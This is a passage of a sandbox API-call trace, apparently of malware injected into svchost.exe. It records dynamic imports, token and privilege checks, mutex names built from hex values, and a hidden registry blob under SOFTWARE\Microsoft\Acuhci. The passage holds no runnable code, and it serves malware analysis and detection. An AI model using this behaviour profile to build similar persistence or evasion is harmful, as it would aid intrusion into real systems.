lpProcName="CryptVerifySignatureW") returned 0x7774c54a [0313.077] GetProcAddress (hModule=0x77740000, lpProcName="SetNamedSecurityInfoW") returned 0x77749fe2 [0313.077] GetProcAddress (hModule=0x77740000, lpProcName="GetNamedSecurityInfoW") returned 0x7774f4fd [0313.077] GetProcAddress (hModule=0x77740000, lpProcName="CryptCreateHash") returned 0x7774df4e [0313.077] GetProcAddress (hModule=0x77740000, lpProcName="CryptHashData") returned 0x7774df36 [0313.077] GetProcAddress (hModule=0x77740000, lpProcName="SetSecurityDescriptorSacl") returned 0x77754680 [0313.077] GetProcAddress (hModule=0x77740000, lpProcName="RegSetValueExW") returned 0x777514d6 [0313.077] GetProcAddress (hModule=0x77740000, lpProcName="CryptDestroyHash") returned 0x7774df66 [0313.077] GetProcAddress (hModule=0x77740000, lpProcName="OpenProcessToken") returned 0x77754304 [0313.077] GetProcAddress (hModule=0x77740000, lpProcName="FreeSid") returned 0x7775412e [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="InitializeSecurityDescriptor") returned 0x77754620 [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="RegOpenKeyExW") returned 0x7775468d [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="CryptImportKey") returned 0x7774c532 [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x77751f59 [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="OpenThreadToken") returned 0x7775432c [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="RegQueryValueExW") returned 0x777546ad [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="CryptReleaseContext") returned 0x7774e124 [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="GetTokenInformation") returned 0x7775431c [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="CryptDestroyKey") returned 0x7774c51a [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="AdjustTokenPrivileges") returned 0x7775418e [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="SetSecurityDescriptorDacl") returned 0x7775415e [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="GetSecurityDescriptorSacl") returned 0x77754608 [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="LookupPrivilegeValueW") returned 0x777541b3 [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="GetLengthSid") returned 0x7775413b [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="RegDeleteValueW") returned 0x7774cf31 [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="RegFlushKey") returned 0x7776773f [0313.078] GetProcAddress (hModule=0x77740000, lpProcName="RegNotifyChangeKeyValue") returned 0x7774e15b [0313.079] GetProcAddress (hModule=0x77740000, lpProcName="RegQueryInfoKeyW") returned 0x777546e7 [0313.079] GetProcAddress (hModule=0x77740000, lpProcName="RegEnumKeyW") returned 0x7775445b [0313.079] GetProcAddress (hModule=0x77740000, lpProcName="InitiateSystemShutdownExW") returned 0x7779db3a [0313.079] GetProcAddress (hModule=0x77740000, lpProcName="CryptAcquireContextW") returned 0x7774df14 [0313.079] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x76a70000 [0313.081] GetProcAddress (hModule=0x76a70000, lpProcName="ShellExecuteW") returned 0x76a83c71 [0313.081] GetProcAddress (hModule=0x76a70000, lpProcName="ShellExecuteExW") returned 0x76a91e46 [0313.081] GetProcAddress (hModule=0x76a70000, lpProcName="SHGetFolderPathW") returned 0x76af5708 [0313.081] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0313.081] GetProcAddress (hModule=0x76370000, lpProcName="PathFileExistsW") returned 0x763845bf [0313.081] GetProcAddress (hModule=0x76370000, lpProcName="PathIsURLW") returned 0x763855bf [0313.082] GetProcAddress (hModule=0x76370000, lpProcName="PathIsDirectoryEmptyW") returned 0x763acd81 [0313.082] GetProcAddress (hModule=0x76370000, lpProcName="StrCmpNIW") returned 0x76384745 [0313.082] GetProcAddress (hModule=0x76370000, lpProcName="PathRenameExtensionW") returned 0x763ad32a [0313.082] GetProcAddress (hModule=0x76370000, lpProcName="StrStrIW") returned 0x763846e9 [0313.082] GetProcAddress (hModule=0x76370000, lpProcName="PathMatchSpecW") returned 0x763886f7 [0313.082] GetProcAddress (hModule=0x76370000, lpProcName="PathCombineW") returned 0x7638c39c [0313.082] GetProcAddress (hModule=0x76370000, lpProcName="PathRemoveFileSpecW") returned 0x76383248 [0313.082] GetProcAddress (hModule=0x76370000, lpProcName="PathAddBackslashW") returned 0x7638c177 [0313.082] GetProcAddress (hModule=0x76370000, lpProcName="wvnsprintfW") returned 0x763b066c [0313.082] GetProcAddress (hModule=0x76370000, lpProcName="PathUnquoteSpacesW") returned 0x76385331 [0313.082] GetProcAddress (hModule=0x76370000, lpProcName="PathSkipRootW") returned 0x7639fbf5 [0313.082] GetProcAddress (hModule=0x76370000, lpProcName="PathFindExtensionW") returned 0x7638a1b9 [0313.082] GetProcAddress (hModule=0x76370000, lpProcName="SHDeleteValueW") returned 0x7637fcca [0313.082] GetProcAddress (hModule=0x76370000, lpProcName="wvnsprintfA") returned 0x7639edfe [0313.082] GetProcAddress (hModule=0x76370000, lpProcName="PathIsDirectoryW") returned 0x7637ff07 [0313.082] GetProcAddress (hModule=0x76370000, lpProcName="PathRemoveBackslashW") returned 0x76385c62 [0313.083] GetProcAddress (hModule=0x76370000, lpProcName="UrlUnescapeA") returned 0x7639c6fb [0313.083] GetProcAddress (hModule=0x76370000, lpProcName="PathQuoteSpacesW") returned 0x763ace21 [0313.083] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x75ad0000 [0313.083] GetProcAddress (hModule=0x75ad0000, lpProcName="GetModuleFileNameExW") returned 0x75ad13f0 [0313.083] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0313.133] GetProcAddress (hModule=0x75ae0000, lpProcName="CLSIDFromString") returned 0x75afe599 [0313.133] GetProcAddress (hModule=0x75ae0000, lpProcName="CoInitializeEx") returned 0x75b209ad [0313.133] GetProcAddress (hModule=0x75ae0000, lpProcName="CreateStreamOnHGlobal") returned 0x75b0363b [0313.133] GetProcAddress (hModule=0x75ae0000, lpProcName="CoSetProxyBlanket") returned 0x75af5ea5 [0313.133] GetProcAddress (hModule=0x75ae0000, lpProcName="CoCreateInstance") returned 0x75b29d0b [0313.133] GetProcAddress (hModule=0x75ae0000, lpProcName="CoUninitialize") returned 0x75b286d3 [0313.133] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0313.133] GetProcAddress (hModule=0x76950000, lpProcName="DeleteObject") returned 0x76965689 [0313.134] GetProcAddress (hModule=0x76950000, lpProcName="GetDeviceCaps") returned 0x76964de0 [0313.134] GetProcAddress (hModule=0x76950000, lpProcName="CreateDCW") returned 0x7696e743 [0313.134] GetProcAddress (hModule=0x76950000, lpProcName="CreateCompatibleDC") returned 0x769654f4 [0313.134] GetProcAddress (hModule=0x76950000, lpProcName="SelectObject") returned 0x76964f70 [0313.134] GetProcAddress (hModule=0x76950000, lpProcName="CreateCompatibleBitmap") returned 0x76965f49 [0313.134] GetProcAddress (hModule=0x76950000, lpProcName="BitBlt") returned 0x76965ea6 [0313.134] GetProcAddress (hModule=0x76950000, lpProcName="DeleteDC") returned 0x769658b3 [0313.134] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0313.137] GetProcAddress (hModule=0x75f20000, lpProcName="InternetConnectA") returned 0x75f449e9 [0313.137] GetProcAddress (hModule=0x75f20000, lpProcName="InternetReadFile") returned 0x75f3b406 [0313.137] GetProcAddress (hModule=0x75f20000, lpProcName="HttpQueryInfoA") returned 0x75f3a33e [0313.137] GetProcAddress (hModule=0x75f20000, lpProcName="InternetQueryOptionA") returned 0x75f31b56 [0313.137] GetProcAddress (hModule=0x75f20000, lpProcName="HttpOpenRequestA") returned 0x75f44c7d [0313.137] GetProcAddress (hModule=0x75f20000, lpProcName="InternetCrackUrlA") returned 0x75f2d075 [0313.137] GetProcAddress (hModule=0x75f20000, lpProcName="InternetSetOptionA") returned 0x75f375e8 [0313.137] GetProcAddress (hModule=0x75f20000, lpProcName="InternetOpenA") returned 0x75f4f18e [0313.137] GetProcAddress (hModule=0x75f20000, lpProcName="InternetCloseHandle") returned 0x75f3ab49 [0313.138] GetProcAddress (hModule=0x75f20000, lpProcName="HttpSendRequestA") returned 0x75fb18f8 [0313.138] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76690000 [0313.138] GetProcAddress (hModule=0x76690000, lpProcName="ObtainUserAgentString") returned 0x766c1d76 [0313.138] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x761b0000 [0313.138] GetProcAddress (hModule=0x761b0000, lpProcName=0x9) returned 0x761b3eae [0313.138] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x75690000 [0313.139] GetProcAddress (hModule=0x75690000, lpProcName="GetUserNameExW") returned 0x7582a415 [0313.139] GetCurrentProcessId () returned 0x7f8 [0313.139] CryptAcquireContextW (in: phProv=0x87e5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x87e5c*=0x2de630) returned 1 [0313.161] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x784e9) returned 0x2de250 [0313.161] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x877f0, dwRevision=0x1 | out: pSecurityDescriptor=0x877f0) returned 1 [0313.161] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x877f0, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x877f0) returned 1 [0313.161] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0313.172] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x2da500, lpbSaclPresent=0xced90, pSacl=0xced98, lpbSaclDefaulted=0xced94 | out: lpbSaclPresent=0xced90, pSacl=0xced98, lpbSaclDefaulted=0xced94) returned 1 [0313.173] SetSecurityDescriptorSacl (in: pSecurityDescriptor=0x877f0, bSaclPresent=1, pSacl=0x2da514, bSaclDefaulted=0 | out: pSecurityDescriptor=0x877f0) returned 1 [0313.173] GetVersionExW (in: lpVersionInformation=0xcec84*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x77ce3472, dwMinorVersion=0x0, dwBuildNumber=0x2e1570, dwPlatformId=0x0, szCSDVersion="ⴼ疝ⴼ疝") | out: lpVersionInformation=0xcec84*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0313.173] GetVersionExW (in: lpVersionInformation=0xcec70*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xced28, dwMinorVersion=0x77dfd, dwBuildNumber=0x6, dwPlatformId=0x1, szCSDVersion="Ĝ") | out: lpVersionInformation=0xcec70*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0313.173] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0xced9c | out: TokenHandle=0xced9c*=0xe0) returned 1 [0313.173] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xced98 | out: TokenInformation=0x0, ReturnLength=0xced98) returned 0 [0313.173] GetLastError () returned 0x7a [0313.173] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x19, TokenInformation=0x4af7d0, TokenInformationLength=0x14, ReturnLength=0xced98 | out: TokenInformation=0x4af7d0, ReturnLength=0xced98) returned 1 [0313.173] GetSidSubAuthorityCount (pSid=0x4af7d8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x4af7d9 [0313.173] GetSidSubAuthority (pSid=0x4af7d8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x4af7e0 [0313.173] CloseHandle (hObject=0xe0) returned 1 [0313.173] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0xcf814 | out: TokenHandle=0xcf814*=0xe0) returned 1 [0313.173] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcf7fc | out: TokenInformation=0x0, ReturnLength=0xcf7fc) returned 0 [0313.173] GetLastError () returned 0x7a [0313.173] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0x1, TokenInformation=0x4af7d0, TokenInformationLength=0x24, ReturnLength=0xcf7fc | out: TokenInformation=0x4af7d0, ReturnLength=0xcf7fc) returned 1 [0313.173] GetTokenInformation (in: TokenHandle=0xe0, TokenInformationClass=0xc, TokenInformation=0x877e0, TokenInformationLength=0x4, ReturnLength=0xcf810 | out: TokenInformation=0x877e0, ReturnLength=0xcf810) returned 1 [0313.173] CloseHandle (hObject=0xe0) returned 1 [0313.173] GetLengthSid (pSid=0x4af7d8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0313.173] GetCurrentProcess () returned 0xffffffff [0313.173] GetModuleFileNameExW (in: hProcess=0xffffffff, hModule=0x0, lpFilename=0xcf614, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\svchost.exe" (normalized: "c:\\windows\\syswow64\\svchost.exe")) returned 0x1f [0313.173] wvnsprintfW (in: pszDest=0xcf560, cchDest=3, pszFmt="%02X", arglist=0xcf53c | out: pszDest="20") returned 2 [0313.173] wvnsprintfW (in: pszDest=0xcf560, cchDest=3, pszFmt="%02X", arglist=0xcf53c | out: pszDest="BC") returned 2 [0313.173] wvnsprintfW (in: pszDest=0xcf560, cchDest=3, pszFmt="%02X", arglist=0xcf53c | out: pszDest="29") returned 2 [0313.173] wvnsprintfW (in: pszDest=0xcf560, cchDest=3, pszFmt="%02X", arglist=0xcf53c | out: pszDest="E1") returned 2 [0313.173] wvnsprintfW (in: pszDest=0xcf560, cchDest=3, pszFmt="%02X", arglist=0xcf53c | out: pszDest="35") returned 2 [0313.173] wvnsprintfW (in: pszDest=0xcf560, cchDest=3, pszFmt="%02X", arglist=0xcf53c | out: pszDest="FB") returned 2 [0313.173] wvnsprintfW (in: pszDest=0xcf560, cchDest=3, pszFmt="%02X", arglist=0xcf53c | out: pszDest="9B") returned 2 [0313.173] wvnsprintfW (in: pszDest=0xcf560, cchDest=3, pszFmt="%02X", arglist=0xcf53c | out: pszDest="01") returned 2 [0313.173] wvnsprintfW (in: pszDest=0xcf560, cchDest=3, pszFmt="%02X", arglist=0xcf53c | out: pszDest="28") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcf560, cchDest=3, pszFmt="%02X", arglist=0xcf53c | out: pszDest="51") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcf560, cchDest=3, pszFmt="%02X", arglist=0xcf53c | out: pszDest="87") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcf560, cchDest=3, pszFmt="%02X", arglist=0xcf53c | out: pszDest="E3") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcf560, cchDest=3, pszFmt="%02X", arglist=0xcf53c | out: pszDest="B5") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcf560, cchDest=3, pszFmt="%02X", arglist=0xcf53c | out: pszDest="59") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcf560, cchDest=3, pszFmt="%02X", arglist=0xcf53c | out: pszDest="3C") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcf560, cchDest=3, pszFmt="%02X", arglist=0xcf53c | out: pszDest="C8") returned 2 [0313.174] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="20BC29E135FB9B01285187E3B5593CC8") returned 0xe0 [0313.174] GetLastError () returned 0x0 [0313.174] wvnsprintfW (in: pszDest=0xcef00, cchDest=3, pszFmt="%02X", arglist=0xceedc | out: pszDest="AB") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcef00, cchDest=3, pszFmt="%02X", arglist=0xceedc | out: pszDest="C6") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcef00, cchDest=3, pszFmt="%02X", arglist=0xceedc | out: pszDest="B5") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcef00, cchDest=3, pszFmt="%02X", arglist=0xceedc | out: pszDest="B7") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcef00, cchDest=3, pszFmt="%02X", arglist=0xceedc | out: pszDest="74") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcef00, cchDest=3, pszFmt="%02X", arglist=0xceedc | out: pszDest="FF") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcef00, cchDest=3, pszFmt="%02X", arglist=0xceedc | out: pszDest="9F") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcef00, cchDest=3, pszFmt="%02X", arglist=0xceedc | out: pszDest="D7") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcef00, cchDest=3, pszFmt="%02X", arglist=0xceedc | out: pszDest="F5") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcef00, cchDest=3, pszFmt="%02X", arglist=0xceedc | out: pszDest="4E") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcef00, cchDest=3, pszFmt="%02X", arglist=0xceedc | out: pszDest="C2") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcef00, cchDest=3, pszFmt="%02X", arglist=0xceedc | out: pszDest="77") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcef00, cchDest=3, pszFmt="%02X", arglist=0xceedc | out: pszDest="09") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcef00, cchDest=3, pszFmt="%02X", arglist=0xceedc | out: pszDest="8C") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcef00, cchDest=3, pszFmt="%02X", arglist=0xceedc | out: pszDest="64") returned 2 [0313.174] wvnsprintfW (in: pszDest=0xcef00, cchDest=3, pszFmt="%02X", arglist=0xceedc | out: pszDest="EE") returned 2 [0313.174] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0xe4 [0313.174] WaitForSingleObject (hHandle=0xe4, dwMilliseconds=0xffffffff) returned 0x0 [0313.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcee02, cbMultiByte=6, lpWideCharStr=0x89b20, cchWideChar=10 | out: lpWideCharStr="Acuhci") returned 6 [0313.174] PathCombineW (in: pszDest=0x89a68, pszDir="SOFTWARE\\Microsoft", pszFile="Acuhci" | out: pszDest="SOFTWARE\\Microsoft\\Acuhci") returned="SOFTWARE\\Microsoft\\Acuhci" [0313.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcee20, cbMultiByte=9, lpWideCharStr=0x89b20, cchWideChar=10 | out: lpWideCharStr="Baywkivyl") returned 9 [0313.174] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0xcee20 | out: phkResult=0xcee20*=0xec) returned 0x0 [0313.174] RegQueryValueExW (in: hKey=0xec, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0xcee4c, lpData=0x0, lpcbData=0xcee34*=0x0 | out: lpType=0xcee4c*=0x3, lpData=0x0, lpcbData=0xcee34*=0x6f0) returned 0x0 [0313.175] RegQueryValueExW (in: hKey=0xec, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0xcee4c, lpData=0x4af850, lpcbData=0xcee34*=0x6f0 | out: lpType=0xcee4c*=0x3, lpData=0x4af850*, lpcbData=0xcee34*=0x6f0) returned 0x0 [0313.175] RegCloseKey (hKey=0xec) returned 0x0 [0313.175] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0xcee34, lpdwDisposition=0x0 | out: phkResult=0xcee34*=0xec, lpdwDisposition=0x0) returned 0x0 [0313.175] RegSetValueExW (in: hKey=0xec, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x4af868*, cbData=0x6f0 | out: lpData=0x4af868*) returned 0x0 [0313.175] RegCloseKey (hKey=0xec) returned 0x0 [0313.175] ReleaseMutex (hMutex=0xe4) returned 1 [0313.175] CloseHandle (hObject=0xe4) returned 1 [0313.175] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x795f6, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xe4 [0313.176] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x799af, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xec [0313.176] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="02") returned 2 [0313.176] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="7E") returned 2 [0313.176] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="B9") returned 2 [0313.176] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="CF") returned 2 [0313.176] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="E1") returned 2 [0313.176] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="D6") returned 2 [0313.176] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="DD") returned 2 [0313.176] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="FF") returned 2 [0313.176] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="BD") returned 2 [0313.176] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="D8") returned 2 [0313.176] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="0F") returned 2 [0313.176] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="00") returned 2 [0313.176] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="A0") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="B9") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="BE") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="FA") returned 2 [0313.177] CreateEventW (lpEventAttributes=0x877e4, bManualReset=1, bInitialState=0, lpName="027EB9CFE1D6DDFFBDD80F00A0B9BEFA") returned 0xf0 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="E4") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="15") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="06") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="9D") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="ED") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="46") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="0A") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="21") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="10") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="76") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="00") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="42") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="5E") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="14") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="F7") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="A6") returned 2 [0313.177] CreateEventW (lpEventAttributes=0x877e4, bManualReset=1, bInitialState=0, lpName="E415069DED460A21107600425E14F7A6") returned 0xf4 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="03") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="10") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="8A") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="87") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="9F") returned 2 [0313.177] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="80") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="B8") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="F7") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="A9") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="49") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="6B") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="90") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="B4") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="7E") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="AA") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="DC") returned 2 [0313.178] CreateEventW (lpEventAttributes=0x877e4, bManualReset=1, bInitialState=0, lpName="03108A879F80B8F7A9496B90B47EAADC") returned 0xf8 [0313.178] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7ffbf, lpParameter=0x4af850, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="6D") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="67") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="41") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="3D") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", arglist=0xcee84 | out: pszDest="D2") returned 2 [0313.178] wvnsprintfW (in: pszDest=0xceea8, cchDest=3, pszFmt="%02X", 